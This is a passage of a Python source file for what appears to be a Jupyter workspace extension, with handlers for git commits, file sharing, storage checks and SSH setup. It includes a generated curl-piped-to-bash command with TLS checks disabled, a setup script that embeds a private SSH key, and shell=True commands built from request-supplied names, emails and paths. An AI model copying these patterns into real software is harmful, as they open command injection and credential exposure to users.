if MAX_WORKSPACE_FOLDER_SIZE and MAX_WORKSPACE_FOLDER_SIZE.isnumeric():
    MAX_WORKSPACE_FOLDER_SIZE = int(MAX_WORKSPACE_FOLDER_SIZE)
else:
    MAX_WORKSPACE_FOLDER_SIZE = None
MAX_CONTAINER_SIZE = os.getenv("MAX_CONTAINER_SIZE", None)
if MAX_CONTAINER_SIZE and MAX_CONTAINER_SIZE.isnumeric():
    MAX_CONTAINER_SIZE = int(MAX_CONTAINER_SIZE)
else:
    MAX_CONTAINER_SIZE = None
# -------------- HANDLER -------------------------
class HelloWorldHandler(IPythonHandler):
    """Unauthenticated smoke-test handler: echoes the request origin and base_url."""

    def data_received(self, chunk):
        # Streamed request bodies are not used by this handler.
        pass

    def get(self):
        result = self.request.protocol + "://" + self.request.host
        if "base_url" in self.application.settings:
            result = result + " " + self.application.settings["base_url"]
        self.finish(result)
def handle_error(handler, status_code: int, error_msg: str = None, exception=None):
    """Finish the request with a JSON ``{"error": ...}`` body and log the failure.

    The message combines *error_msg* and, when given, the stringified *exception*.
    """
    handler.set_status(status_code)
    message = error_msg or ""
    if exception:
        if message:
            message += "\nException: "
        message += str(exception)
    handler.finish(json.dumps({"error": message}))
    log.info("An error occurred (" + str(status_code) + "): " + message)
def send_data(handler, data):
    """Finish the request with *data* serialized as pretty-printed, key-sorted JSON."""
    payload = json.dumps(data, sort_keys=True, indent=4)
    handler.finish(payload)
class PingHandler(IPythonHandler):
    """Authenticated liveness probe."""

    @web.authenticated
    def get(self):
        # Used by Jupyterhub to test if user cookies are valid
        self.finish("Successful")
class InstallToolHandler(IPythonHandler):
    """GET: list installable tools, one entry per ``*.sh`` script in ``$RESOURCES_PATH/tools/``.

    Each entry is ``{"name": <script basename>, "command": "/bin/bash <script>"}``.
    """

    @web.authenticated
    def get(self):
        try:
            workspace_installer_folder = RESOURCES_PATH + "/tools/"
            workspace_tool_installers = []
            # sort entries by name
            for f in sorted(
                glob.glob(os.path.join(workspace_installer_folder, "*.sh"))
            ):
                tool_name = os.path.splitext(os.path.basename(f))[0].strip()
                workspace_tool_installers.append(
                    {"name": tool_name, "command": "/bin/bash " + f}
                )
            if not workspace_tool_installers:
                # Fix: logging's warn() is a deprecated alias of warning().
                log.warning(
                    "No workspace tool installers found at path: "
                    + workspace_installer_folder
                )
                # Backup if file does not exist
                workspace_tool_installers.append(
                    {
                        "name": "none",
                        "command": "No workspace tool installers found at path: "
                        + workspace_installer_folder,
                    }
                )
            self.finish(json.dumps(workspace_tool_installers))
        except Exception as ex:
            handle_error(self, 500, exception=ex)
            return
class ToolingHandler(IPythonHandler):
    """GET: list workspace tool descriptors from ``~/.workspace/tools/*.json``.

    Each file may contain a single tool dict or a list of them; tools sharing
    an ``id`` are deduplicated (first one wins).
    """

    @web.authenticated
    def get(self):
        try:
            workspace_tooling_folder = HOME + "/.workspace/tools/"
            workspace_tools = []

            def tool_is_duplicated(tool_array, tool):
                """ Tools with same ID should only be added once to the list"""
                for t in tool_array:
                    if "id" in t and "id" in tool and tool["id"] == t["id"]:
                        return True
                return False

            # sort entries by name
            for f in sorted(
                glob.glob(os.path.join(workspace_tooling_folder, "*.json"))
            ):
                try:
                    with open(f, "rb") as tool_file:
                        tool_data = json.load(tool_file)
                    if not tool_data:
                        continue
                    if isinstance(tool_data, dict):
                        if not tool_is_duplicated(workspace_tools, tool_data):
                            workspace_tools.append(tool_data)
                    else:
                        # tool data is probably an array
                        for tool in tool_data:
                            if not tool_is_duplicated(workspace_tools, tool):
                                workspace_tools.append(tool)
                except Exception:
                    # Bug fix: ``f`` is a path string from glob, not a file object —
                    # the original ``f.name`` raised AttributeError while logging.
                    # Also: warn() is a deprecated alias of warning().
                    log.warning("Failed to load tools file: " + f)
                    continue
            if not workspace_tools:
                log.warning(
                    "No workspace tools found at path: " + workspace_tooling_folder
                )
                # Backup if file does not exist
                workspace_tools.append(
                    {
                        "id": "vnc-link",
                        "name": "VNC",
                        "url_path": "/tools/vnc/?password=vncpassword",
                        "description": "Desktop GUI for the workspace",
                    }
                )
            self.finish(json.dumps(workspace_tools))
        except Exception as ex:
            handle_error(self, 500, exception=ex)
            return
class GitCommitHandler(IPythonHandler):
    """POST: commit (and push) a single file.

    JSON body: ``filePath`` (required, URL-encoded, relative to the server root)
    and optional ``commitMsg``.
    """

    @web.authenticated
    def post(self):
        data = self.get_json_body()
        if data is None:
            handle_error(
                self, 400, "Please provide a valid file path and commit msg in body."
            )
            return
        if "filePath" not in data or not data["filePath"]:
            handle_error(self, 400, "Please provide a valid filePath in body.")
            return
        # Paths arrive URL-encoded and relative to the Jupyter server root.
        file_path = _resolve_path(unquote(data["filePath"]))
        commit_msg = None
        if "commitMsg" in data:
            commit_msg = unquote(data["commitMsg"])
        try:
            commit_file(file_path, commit_msg)
        except Exception as ex:
            handle_error(self, 500, exception=ex)
            return
class GitInfoHandler(IPythonHandler):
    """GET: return repo info for a path; POST: set the git user name/email."""

    @web.authenticated
    def get(self):
        try:
            path = _resolve_path(self.get_argument("path", None))
            send_data(self, get_git_info(path))
        except Exception as ex:
            handle_error(self, 500, exception=ex)
            return

    @web.authenticated
    def post(self):
        # When ``path`` resolves to a repo, the identity is set repo-locally;
        # otherwise it falls through to the global git config (see set_user_*).
        path = _resolve_path(self.get_argument("path", None))
        data = self.get_json_body()
        if data is None:
            handle_error(self, 400, "Please provide a valid name and email in body.")
            return
        if "email" not in data or not data["email"]:
            handle_error(self, 400, "Please provide a valid email.")
            return
        email = data["email"]
        if "name" not in data or not data["name"]:
            handle_error(self, 400, "Please provide a valid name.")
            return
        name = data["name"]
        try:
            repo = get_repo(path)
            set_user_email(email, repo)
            set_user_name(name, repo)
        except Exception as ex:
            handle_error(self, 500, exception=ex)
            return
class SSHScriptHandler(IPythonHandler):
    """GET (authenticated): serve the SSH setup script for this workspace."""

    @web.authenticated
    def get(self):
        try:
            handle_ssh_script_request(self)
        except Exception as ex:
            handle_error(self, 500, exception=ex)
            return
class SharedSSHHandler(IPythonHandler):
    """GET: serve the SSH setup script authenticated only by a shared token.

    Unlike SSHScriptHandler there is no ``@web.authenticated`` — the caller must
    present the key-derived token (see generate_token) as a query parameter.
    Error responses are shell ``echo`` lines because the client pipes this
    endpoint's output into bash.
    """

    def get(self):
        # authentication only via token
        try:
            sharing_enabled = os.environ.get("SHARED_LINKS_ENABLED", "false")
            if sharing_enabled.lower() != "true":
                handle_error(
                    self,
                    401,
                    error_msg="Shared links are disabled. Please download and execute the SSH script manually.",
                )
                return
            token = self.get_argument("token", None)
            # The expected token is derived from the request path + private key.
            valid_token = generate_token(self.request.path)
            if not token:
                self.set_status(401)
                self.finish('echo "Please provide a token via get parameter."')
                return
            if token.lower().strip() != valid_token:
                self.set_status(401)
                self.finish('echo "The provided token is not valid."')
                return
            handle_ssh_script_request(self)
        except Exception as ex:
            handle_error(self, 500, exception=ex)
            return
class SSHCommandHandler(IPythonHandler):
    """GET: return a one-line shell command that fetches and runs the SSH setup script.

    Requires an ``origin`` query parameter (full endpoint URL) so the command
    can address this workspace from the outside.
    """

    @web.authenticated
    def get(self):
        try:
            sharing_enabled = os.environ.get("SHARED_LINKS_ENABLED", "false")
            if sharing_enabled.lower() != "true":
                # Typo fix: "executen" -> "execute".
                self.finish(
                    "Shared links are disabled. Please download and execute the SSH script manually."
                )
                return
            # schema + host + port
            origin = self.get_argument("origin", None)
            if not origin:
                handle_error(
                    self,
                    400,
                    "Please provide a valid origin (endpoint url) via get parameter.",
                )
                return
            host, port = parse_endpoint_origin(origin)
            base_url = web_app.settings["base_url"].rstrip("/") + SHARED_SSH_SETUP_PATH
            # curl the token-protected setup script from this workspace and pipe it to bash
            setup_command = (
                '/bin/bash <(curl -s --insecure "'
                + origin
                + base_url
                + "?token="
                + generate_token(base_url)
                + "&host="
                + host
                + "&port="
                + port
                + '")'
            )
            self.finish(setup_command)
        except Exception as ex:
            handle_error(self, 500, exception=ex)
            return
class SharedTokenHandler(IPythonHandler):
    """GET: return the sharing token for a given path (requires SHARED_LINKS_ENABLED)."""

    @web.authenticated
    def get(self):
        try:
            sharing_enabled = os.environ.get("SHARED_LINKS_ENABLED", "false")
            if sharing_enabled.lower() != "true":
                handle_error(self, 400, error_msg="Shared links are disabled.")
                return
            path = self.get_argument("path", None)
            if path is None:
                handle_error(
                    self, 400, "Please provide a valid path via get parameter."
                )
                return
            self.finish(generate_token(path))
        except Exception as ex:
            handle_error(self, 500, exception=ex)
            return
class SharedFilesHandler(IPythonHandler):
    """GET: create a read-only filebrowser share for a path and return its URL.

    A filebrowser user named after the path token is created with download-only
    permissions scoped to the path; the returned URL embeds the same token.
    """

    @web.authenticated
    def get(self):
        try:
            sharing_enabled = os.environ.get("SHARED_LINKS_ENABLED", "false")
            if sharing_enabled.lower() != "true":
                self.finish(
                    "Shared links are disabled. Please download and share the data manually."
                )
                return
            path = _resolve_path(self.get_argument("path", None))
            if not path:
                handle_error(
                    self, 400, "Please provide a valid path via get parameter."
                )
                return
            if not os.path.exists(path):
                handle_error(
                    self, 400, "The selected file or folder does not exist: " + path
                )
                return
            # schema + host + port
            origin = self.get_argument("origin", None)
            if not origin:
                handle_error(
                    self,
                    400,
                    "Please provide a valid origin (endpoint url) via get parameter.",
                )
                return
            token = generate_token(path)
            try:
                # filebrowser needs to be stopped so that a user can be added
                call("supervisorctl stop filebrowser", shell=True)
                # Add new user with the given permissions and scope.
                # NOTE(review): the command is built by string concatenation with a
                # user-influenced ``path`` and run with shell=True — a path containing
                # quotes could break out of the command. Consider a list argv — verify.
                add_user_command = (
                    "filebrowser users add "
                    + token
                    + " "
                    + token
                    + " --perm.admin=false --perm.create=false --perm.delete=false"
                    + " --perm.download=true --perm.execute=false --perm.modify=false"
                    + " --perm.rename=false --perm.share=false --lockPassword=true"
                    + " --database="
                    + HOME
                    + '/filebrowser.db --scope="'
                    + path
                    + '"'
                )
                call(add_user_command, shell=True)
            except Exception:
                # Best-effort: user may already exist; filebrowser is restarted below.
                pass
            call("supervisorctl start filebrowser", shell=True)
            base_url = web_app.settings["base_url"].rstrip("/") + "/shared/filebrowser/"
            setup_command = origin + base_url + "?token=" + token
            self.finish(setup_command)
        except Exception as ex:
            handle_error(self, 500, exception=ex)
            return
class StorageCheckHandler(IPythonHandler):
    """GET: report whether container / workspace-folder disk usage exceeds limits.

    Sizes come from the cached metadata file; a background refresh is kicked off
    at most once per CHECK_INTERVAL_MINUTES.
    """

    @web.authenticated
    def get(self) -> None:
        try:
            CHECK_INTERVAL_MINUTES = 5
            result = {
                "workspaceFolderSizeWarning": False,
                "containerSizeWarning": False
            }
            if not MAX_WORKSPACE_FOLDER_SIZE and not MAX_CONTAINER_SIZE:
                # No limits configured -> nothing to check.
                self.finish(json.dumps(result))
                return
            minutes_since_update = get_minutes_since_size_update()
            if minutes_since_update is not None and minutes_since_update < CHECK_INTERVAL_MINUTES:
                # only run check every 5 minutes
                self.finish(json.dumps(result))
                return
            # run update in background -> sometimes it might need too much time to run
            thread = threading.Thread(target=update_workspace_metadata)
            thread.daemon = True
            thread.start()
            container_size_in_gb = get_container_size()
            if MAX_CONTAINER_SIZE:
                if container_size_in_gb > MAX_CONTAINER_SIZE:
                    # Wait for metadata update before showing the warning
                    # sleep 50 ms -> metadata file should have been updated, otherwise use old metadata
                    time.sleep(0.050)
                    container_size_in_gb = get_container_size()
                result["containerSize"] = round(container_size_in_gb, 1)
                result["containerSizeLimit"] = round(MAX_CONTAINER_SIZE)
                if container_size_in_gb > MAX_CONTAINER_SIZE:
                    # Still bigger after update -> show the warning
                    result["containerSizeWarning"] = True
                    log.info(
                        "You have exceeded the limit the container size. Please clean up."
                    )
                else:
                    result["containerSizeWarning"] = False
            workspace_folder_size_in_gb = get_workspace_folder_size()
            if MAX_WORKSPACE_FOLDER_SIZE:
                if workspace_folder_size_in_gb > MAX_WORKSPACE_FOLDER_SIZE:
                    # Wait for metadata update before showing the warning
                    # sleep 50 ms -> metadata file should have been updated, otherwise use old metadata
                    time.sleep(0.050)
                    workspace_folder_size_in_gb = get_workspace_folder_size()
                result["workspaceFolderSize"] = round(workspace_folder_size_in_gb, 1)
                result["workspaceFolderSizeLimit"] = round(MAX_WORKSPACE_FOLDER_SIZE)
                if workspace_folder_size_in_gb > MAX_WORKSPACE_FOLDER_SIZE:
                    # Still bigger after update -> show the warning
                    result["workspaceFolderSizeWarning"] = True
                    log.info(
                        "You have exceeded the limit the workspace folder size. Please clean up."
                    )
                else:
                    result["workspaceFolderSizeWarning"] = False
            self.finish(json.dumps(result))
        except Exception as ex:
            handle_error(self, 500, exception=ex)
            return
# ------------- Storage Check Utils ------------------------
def get_last_usage_date(path):
    """Return the most recent of a path's mtime/atime/ctime as a datetime.

    Returns None when the path does not exist or no timestamp could be read.
    Comparison is at day granularity, matching the original behavior.
    """
    if not os.path.exists(path):
        log.info("Path does not exist: " + path)
        return None
    date = None
    # Try each stat timestamp independently; any single call may fail.
    for stat_call in (os.path.getmtime, os.path.getatime, os.path.getctime):
        try:
            candidate = datetime.fromtimestamp(stat_call(path))
        except Exception:
            continue
        # Bug fix: the original compared ``date.date()`` while ``date`` could
        # still be None (when getmtime failed), raising an AttributeError that
        # was silently swallowed — losing the atime/ctime candidates entirely.
        if date is None or date.date() < candidate.date():
            date = candidate
    return date
def update_workspace_metadata():
    """Measure container and workspace-folder disk usage and cache the result.

    Writes ``metadata.json`` into WORKSPACE_CONFIG_FOLDER with an update
    timestamp and sizes in KB (None when a limit is unset or ``du`` failed).
    Runs ``du`` and can take a while — callers run it in a background thread.
    """
    workspace_metadata = {
        "update_timestamp": str(datetime.now()),
        "container_size_in_kb": None,
        "workspace_folder_size_in_kb": None
    }
    if MAX_CONTAINER_SIZE:
        # calculate container size via the root folder
        try:
            # -x stays on one filesystem, excluding other mounts; /proc is skipped
            workspace_metadata["container_size_in_kb"] = int(
                subprocess.check_output(["du", "-sx", "--exclude=/proc", "/"]).split()[0].decode("utf-8")
            )
        except Exception:
            # best-effort: leave the size as None on failure
            pass
    if MAX_WORKSPACE_FOLDER_SIZE:
        # calculate workspace folder size
        try:
            # exclude all different filesystems/mounts
            workspace_metadata["workspace_folder_size_in_kb"] = int(
                subprocess.check_output(["du", "-sx", WORKSPACE_HOME]).split()[0].decode("utf-8")
            )
        except Exception:
            pass
    if not os.path.exists(WORKSPACE_CONFIG_FOLDER):
        os.makedirs(WORKSPACE_CONFIG_FOLDER)
    with open(os.path.join(WORKSPACE_CONFIG_FOLDER, "metadata.json"), "w") as file:
        json.dump(workspace_metadata, file, sort_keys=True, indent=4)
def get_workspace_metadata():
    """Load the cached metadata.json; return an empty dict on any failure."""
    metadata_path = os.path.join(WORKSPACE_CONFIG_FOLDER, "metadata.json")
    if not os.path.isfile(metadata_path):
        return {}
    try:
        with open(metadata_path, "rb") as fh:
            return json.load(fh)
    except Exception:
        return {}
def get_container_size():
    """Container size in GB from the cached metadata; 0 when unknown."""
    try:
        size_kb = int(get_workspace_metadata()["container_size_in_kb"])
        return size_kb / 1024 / 1024
    except Exception:
        return 0
def get_workspace_folder_size():
    """Workspace folder size in GB from the cached metadata; 0 when unknown."""
    try:
        size_kb = int(get_workspace_metadata()["workspace_folder_size_in_kb"])
        return size_kb / 1024 / 1024
    except Exception:
        return 0
def get_minutes_since_size_update():
    """Return whole minutes elapsed since the last metadata.json update.

    Returns None when the metadata file is missing, unreadable, or carries no
    usable timestamp.
    """
    metadata_file_path = os.path.join(WORKSPACE_CONFIG_FOLDER, "metadata.json")
    if os.path.isfile(metadata_file_path):
        try:
            with open(metadata_file_path, "rb") as file:
                workspace_metadata = json.load(file)
            update_timestamp_str = workspace_metadata["update_timestamp"]
            if not update_timestamp_str:
                return None
            updated_date = datetime.strptime(
                update_timestamp_str, "%Y-%m-%d %H:%M:%S.%f"
            )
            # Bug fix: the original used ``.seconds // 60 % 60`` which ignores
            # the days component of the timedelta and wraps every hour — a
            # 61-minute-old file looked 1 minute old, defeating the throttle
            # in StorageCheckHandler. total_seconds() gives true elapsed minutes.
            return int((datetime.now() - updated_date).total_seconds() // 60)
        except Exception:
            return None
    return None
def get_inactive_days():
    """Days since the metadata timestamp was last refreshed; 0 when unknown."""
    # The timestamp is refreshed while the user actively uses the workspace,
    # so its age approximates inactivity.
    metadata_path = os.path.join(WORKSPACE_CONFIG_FOLDER, "metadata.json")
    if os.path.isfile(metadata_path):
        try:
            with open(metadata_path, "rb") as fh:
                stamp = json.load(fh)["update_timestamp"]
            if not stamp:
                return 0
            updated = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S.%f")
            return (datetime.now() - updated).days
        except Exception:
            return 0
    # return 0 as fallback
    return 0
def cleanup_folder(
    folder_path: str,
    max_file_size_mb: int = 50,
    last_file_usage: int = 3,
    replace_with_info: bool = True,
    excluded_folders: list = None,
):
    """
    Cleanup folder to reduce disk space usage.
    # Arguments
    folder_path (str): Folder that should be cleaned.
    max_file_size_mb (int): Only files larger than this size in MB are deleted. Default: 50.
    replace_with_info (bool): Replace removed files with `.removed.txt` files with file removal reason. Default: True.
    last_file_usage (int): Number of days a file wasn't used to allow the file to be removed. Default: 3.
    excluded_folders (list[str]): List of folders to exclude from removal (optional)
    """
    total_cleaned_up_mb = 0
    removed_files = 0
    for dirname, subdirs, files in os.walk(folder_path):
        if excluded_folders:
            for excluded_folder in excluded_folders:
                if excluded_folder in subdirs:
                    log.debug("Ignoring folder because of name: " + excluded_folder)
                    # Pruning subdirs in place stops os.walk from descending.
                    subdirs.remove(excluded_folder)
        for filename in files:
            file_path = os.path.join(dirname, filename)
            file_size_mb = int(os.path.getsize(file_path) / (1024.0 * 1024.0))
            if max_file_size_mb and max_file_size_mb > file_size_mb:
                # File will not be deleted since it is less than the max size
                continue
            # Improvement: stat the file once instead of calling
            # get_last_usage_date twice per file.
            last_usage_date = get_last_usage_date(file_path)
            last_file_usage_days = None
            if last_usage_date:
                last_file_usage_days = (datetime.now() - last_usage_date).days
            if last_file_usage_days and last_file_usage_days <= last_file_usage:
                # File was used recently -> keep it.
                continue
            current_date_str = datetime.now().strftime("%B %d, %Y")
            removal_reason = (
                "File has been removed during folder cleaning ("
                + folder_path
                + ") on "
                + current_date_str
                + ". "
            )
            if file_size_mb and max_file_size_mb:
                removal_reason += (
                    "The file size was "
                    + str(file_size_mb)
                    + " MB (max "
                    + str(max_file_size_mb)
                    + "). "
                )
            if last_file_usage_days and last_file_usage:
                removal_reason += (
                    "The last usage was "
                    + str(last_file_usage_days)
                    + " days ago (max "
                    + str(last_file_usage)
                    + "). "
                )
            log.info(filename + ": " + removal_reason)
            # Remove file
            try:
                os.remove(file_path)
                if replace_with_info:
                    with open(file_path + ".removed.txt", "w") as file:
                        file.write(removal_reason)
                if file_size_mb:
                    total_cleaned_up_mb += file_size_mb
                removed_files += 1
            except Exception as e:
                # Bug fix: the original passed the exception as a stray positional
                # logging argument ("not all arguments converted" logging error).
                log.info("Failed to remove file: " + file_path + " (" + str(e) + ")")
    # check diskspace and update workspace metadata
    update_workspace_metadata()
    log.info(
        "Finished cleaning. Removed "
        + str(removed_files)
        + " files with a total disk space of "
        + str(total_cleaned_up_mb)
        + " MB."
    )
# ------------- GIT FUNCTIONS ------------------------
def execute_command(cmd: str):
    """Run a whitespace-split command and return its stdout with all newlines stripped."""
    output = subprocess.check_output(cmd.split())
    return output.decode("utf-8").replace("\n", "")
def get_repo(directory: str):
    """Return the git.Repo containing *directory* (searching parent dirs), or None.

    None is returned for a falsy directory or when no repo is found / git fails.
    """
    if not directory:
        return None
    try:
        return git.Repo(directory, search_parent_directories=True)
    except Exception:
        return None
def set_user_email(email: str, repo=None):
    """Set git ``user.email`` — repo-locally when *repo* is given, else globally.

    Emits a warning (instead of raising) when the global git call fails.
    """
    if repo:
        repo.config_writer().set_value("user", "email", email).release()
        return
    status = subprocess.call(
        'git config --global user.email "' + email + '"', shell=True
    )
    if status > 0:
        warnings.warn("Global email configuration failed.")
def set_user_name(name: str, repo=None):
    """Set git ``user.name`` — repo-locally when *repo* is given, else globally.

    Emits a warning (instead of raising) when the global git call fails.
    """
    if repo:
        repo.config_writer().set_value("user", "name", name).release()
        return
    status = subprocess.call(
        'git config --global user.name "' + name + '"', shell=True
    )
    if status > 0:
        warnings.warn("Global name configuration failed.")
def commit_file(file_path: str, commit_msg: str = None, push: bool = True):
    """Stage, commit, and optionally push a single file.

    Raises Exception when the file/repo is missing, user identity is unset,
    the repo cannot be fast-forwarded, the file is unchanged, or the push
    requires interactive authentication.
    """
    if not os.path.isfile(file_path):
        raise Exception("File does not exist: " + file_path)
    repo = get_repo(os.path.dirname(file_path))
    if not repo:
        raise Exception("No git repo was found for file: " + file_path)
    # Always add file
    repo.index.add([file_path])
    if not get_user_name(repo):
        raise Exception(
            'Cannot push to remote. Please specify a name with: git config --global user.name "YOUR NAME"'
        )
    if not get_user_email(repo):
        raise Exception(
            'Cannot push to remote. Please specify an email with: git config --global user.emails "YOUR EMAIL"'
        )
    if not commit_msg:
        commit_msg = "Updated " + os.path.relpath(file_path, repo.working_dir)
    try:
        # fetch and merge newest state - fast-forward-only
        repo.git.pull("--ff-only")
    except Exception:
        raise Exception("The repo is not up-to-date or cannot be updated.")
    try:
        # Commit single file with commit message
        repo.git.commit(file_path, m=commit_msg)
    except git.GitCommandError as error:
        # Git reports "up to date" on stdout when the file had no changes;
        # wording differs between git versions, so both variants are checked.
        if error.stdout and (
            "branch is up-to-date with" in error.stdout
            or "branch is up to date with" in error.stdout
        ):
            # TODO better way to check if file has changed, e.g. has_file_changed
            raise Exception("File has not been changed: " + file_path)
        else:
            raise error
    if push:
        # Push file to remote
        try:
            repo.git.push("origin", "HEAD")
        except git.GitCommandError as error:
            # This stderr pattern indicates git tried to prompt for credentials
            # in a non-interactive environment.
            if error.stderr and (
                "No such device or address" in error.stderr
                and "could not read Username" in error.stderr
            ):
                raise Exception(
                    "User is not authenticated. Please use Ungit to login via HTTPS or use SSH authentication."
                )
            else:
                raise error
def get_config_value(key: str, repo=None):
    """Read a git config value from *repo*, or from the global config; None on failure."""
    try:
        if repo is None:
            # no repo, look up global config
            return execute_command("git config " + key)
        return repo.git.config(key)
    except Exception:
        return None
def get_user_name(repo=None):
    """Return git ``user.name`` (repo-local or global); None when unset."""
    return get_config_value("user.name", repo)

def get_user_email(repo=None):
    """Return git ``user.email`` (repo-local or global); None when unset."""
    return get_config_value("user.email", repo)
def get_active_branch(repo) -> str or None:
    """Return the repo's checked-out branch name; None on detached HEAD or error."""
    try:
        branch = repo.active_branch
        return branch.name
    except Exception:
        return None
def get_last_commit(repo) -> str or None:
    """Return the HEAD commit date formatted as 'dd.Month YYYY HH:MM:SS'; None on error."""
    try:
        commit_ts = repo.head.commit.committed_date
        return datetime.fromtimestamp(commit_ts).strftime("%d.%B %Y %I:%M:%S")
    except Exception:
        return None
def has_file_changed(repo, file_path: str):
    """Return True when *file_path* appears in the repo's unstaged diff.

    NOTE(review): "not working in all situations" per the original author —
    e.g. diff(None) only covers unstaged changes; treat as best-effort.
    """
    changed_files = [item.a_path for item in repo.index.diff(None)]
    # Fix: membership test directly on the list — the original wrapped the list
    # in a redundant generator expression (`in (p for p in changed_files)`).
    relative = os.path.relpath(os.path.realpath(file_path), repo.working_dir)
    return relative in changed_files
def get_git_info(directory: str):
    """Return a summary dict (user, repo root, branch, last commit) for *directory*.

    All repo-derived fields are None when *directory* is not inside a git repo;
    userName/userEmail then fall back to the global git config.
    """
    repo = get_repo(directory)
    git_info = {
        "userName": get_user_name(repo),
        "userEmail": get_user_email(repo),
        "repoRoot": repo.working_dir if repo else None,
        "activeBranch": get_active_branch(repo) if repo else None,
        "lastCommit": get_last_commit(repo) if repo else None,
        "requestPath": directory,
    }
    return git_info
def _get_server_root() -> str:
    """Return the Jupyter server root directory with ``~`` expanded."""
    return os.path.expanduser(web_app.settings["server_root_dir"])
def _resolve_path(path: str) -> str or None:
    """Map a client-supplied path onto the Jupyter server root; None for empty input."""
    if not path:
        return None
    # Strip a single leading slash so os.path.join does not treat the
    # client path as absolute (which would discard the server root).
    relative = path[1:] if path.startswith("/") else path
    return os.path.join(_get_server_root(), relative)
# ------------- SSH Functions ------------------------
def handle_ssh_script_request(handler):
    """Resolve host/port from the request and serve the SSH setup script.

    Host and port come from explicit ``host``/``port`` query parameters, or are
    derived from the ``origin`` (full endpoint URL) parameter. With
    ``download=true`` the script is sent as an attachment, otherwise inline.
    """
    origin = handler.get_argument("origin", None)
    host = handler.get_argument("host", None)
    port = handler.get_argument("port", None)
    if not host and origin:
        host, _ = parse_endpoint_origin(origin)
    if not port and origin:
        _, port = parse_endpoint_origin(origin)
    if not host:
        handle_error(
            handler,
            400,
            "Please provide a host via get parameter. Alternatively, you can also specify an origin with the full endpoint url.",
        )
        return
    if not port:
        handle_error(
            handler,
            400,
            "Please provide a port via get parameter. Alternatively, you can also specify an origin with the full endpoint url.",
        )
        return
    setup_script = get_setup_script(host, port)
    download_script_flag = handler.get_argument("download", None)
    if download_script_flag and download_script_flag.lower().strip() == "true":
        # Use host, otherwise it cannot be reconstructed in tooling plugin
        file_name = "setup_ssh_{}-{}".format(host.lower().replace(".", "-"), port)
        SSH_JUMPHOST_TARGET = os.environ.get("SSH_JUMPHOST_TARGET", "")
        if SSH_JUMPHOST_TARGET:
            # add name if variable is set
            file_name += "-" + SSH_JUMPHOST_TARGET.lower().replace(".", "-")
        file_name += ".sh"
        handler.set_header("Content-Type", "application/octet-stream")
        handler.set_header(
            "Content-Disposition", "attachment; filename=" + file_name
        )  # Hostname runtime
        handler.write(setup_script)
        handler.finish()
    else:
        handler.finish(setup_script)
def parse_endpoint_origin(endpoint_url: str):
    """Split an endpoint URL into ``(hostname, port)`` with the port as a string.

    When the URL carries no explicit port, the scheme default is used:
    443 for https, 80 otherwise.
    """
    from urllib.parse import urlparse

    parsed = urlparse(endpoint_url)
    port = parsed.port
    if not port:
        port = 443 if parsed.scheme == "https" else 80
    return parsed.hostname, str(port)
def generate_token(base_url: str):
    """Derive a deterministic per-path access token from the runtime's SSH private key.

    Token = sha1(sha1(private_key) + base_url); anyone holding the key file can
    reproduce any token. NOTE(review): SHA-1 is used here; consider sha256/HMAC —
    confirm compatibility with existing shared links before changing.
    """
    private_ssh_key_path = HOME + "/.ssh/id_ed25519"
    with open(private_ssh_key_path, "r") as f:
        runtime_private_key = f.read()
    import hashlib

    # Hash of the (normalized) private key acts as the shared secret.
    key_hasher = hashlib.sha1()
    key_hasher.update(str.encode(str(runtime_private_key).lower().strip()))
    key_hash = key_hasher.hexdigest()
    # Bind the token to the requested path so tokens are not interchangeable.
    token_hasher = hashlib.sha1()
    token_str = (key_hash + base_url).lower().strip()
    token_hasher.update(str.encode(token_str))
    return str(token_hasher.hexdigest())
def get_setup_script(hostname: str = None, port: str = None):
    """Render the client-side SSH setup script from the bundled template.

    Embeds the runtime's private key, host/port, a known_hosts entry obtained by
    keyscanning localhost, and — when SSH_JUMPHOST_TARGET is set — a
    ProxyCommand hop through the given manager host.
    """
    private_ssh_key_path = HOME + "/.ssh/id_ed25519"
    with open(private_ssh_key_path, "r") as f:
        runtime_private_key = f.read()
    ssh_templates_path = os.path.dirname(os.path.abspath(__file__)) + "/setup_templates"
    with open(ssh_templates_path + "/client_command.txt", "r") as file:
        client_command = file.read()
    SSH_JUMPHOST_TARGET = os.environ.get("SSH_JUMPHOST_TARGET", "")
    is_runtime_manager_existing = False if SSH_JUMPHOST_TARGET == "" else True
    RUNTIME_CONFIG_NAME = "workspace-"
    if is_runtime_manager_existing:
        # Jumphost setup: connect to the manager, which proxies to the runtime.
        HOSTNAME_RUNTIME = SSH_JUMPHOST_TARGET
        HOSTNAME_MANAGER = hostname
        PORT_MANAGER = port
        PORT_RUNTIME = os.getenv("WORKSPACE_PORT", "8080")
        RUNTIME_CONFIG_NAME = RUNTIME_CONFIG_NAME + "{}-{}-{}".format(
            HOSTNAME_RUNTIME, HOSTNAME_MANAGER, PORT_MANAGER
        )
        # Uncomment the template's ProxyCommand line by dropping the leading '#'.
        client_command = (
            client_command.replace("{HOSTNAME_MANAGER}", HOSTNAME_MANAGER)
            .replace("{PORT_MANAGER}", str(PORT_MANAGER))
            .replace("#ProxyCommand", "ProxyCommand")
        )
        local_keyscan_replacement = "{}".format(HOSTNAME_RUNTIME)
    else:
        # Direct setup: connect straight to the runtime host/port.
        HOSTNAME_RUNTIME = hostname
        PORT_RUNTIME = port
        RUNTIME_CONFIG_NAME = RUNTIME_CONFIG_NAME + "{}-{}".format(
            HOSTNAME_RUNTIME, PORT_RUNTIME
        )
        # known_hosts uses the [host]:port form for non-default ports.
        local_keyscan_replacement = "[{}]:{}".format(HOSTNAME_RUNTIME, PORT_RUNTIME)
    # perform keyscan with localhost to get the runtime's keyscan result.
    # Replace then the "localhost" part in the returning string with the actual RUNTIME_HOST_NAME
    local_keyscan_entry = get_ssh_keyscan_results("localhost")
    if local_keyscan_entry is not None:
        local_keyscan_entry = local_keyscan_entry.replace(
            "localhost", local_keyscan_replacement
        )
    output = (
        client_command.replace("{PRIVATE_KEY_RUNTIME}", runtime_private_key)
        .replace("{HOSTNAME_RUNTIME}", HOSTNAME_RUNTIME)
        .replace("{RUNTIME_KNOWN_HOST_ENTRY}", local_keyscan_entry)
        .replace("{PORT_RUNTIME}", str(PORT_RUNTIME))
        .replace("{RUNTIME_CONFIG_NAME}", RUNTIME_CONFIG_NAME)
        .replace(
            "{RUNTIME_KEYSCAN_NAME}",
            # Brackets are escaped because the template uses this in a regex context.
            local_keyscan_replacement.replace("[", "\[").replace("]", "\]"),
        )
    )
    return output
def get_ssh_keyscan_results(host_name, host_port=22, key_format="ecdsa"):
    """
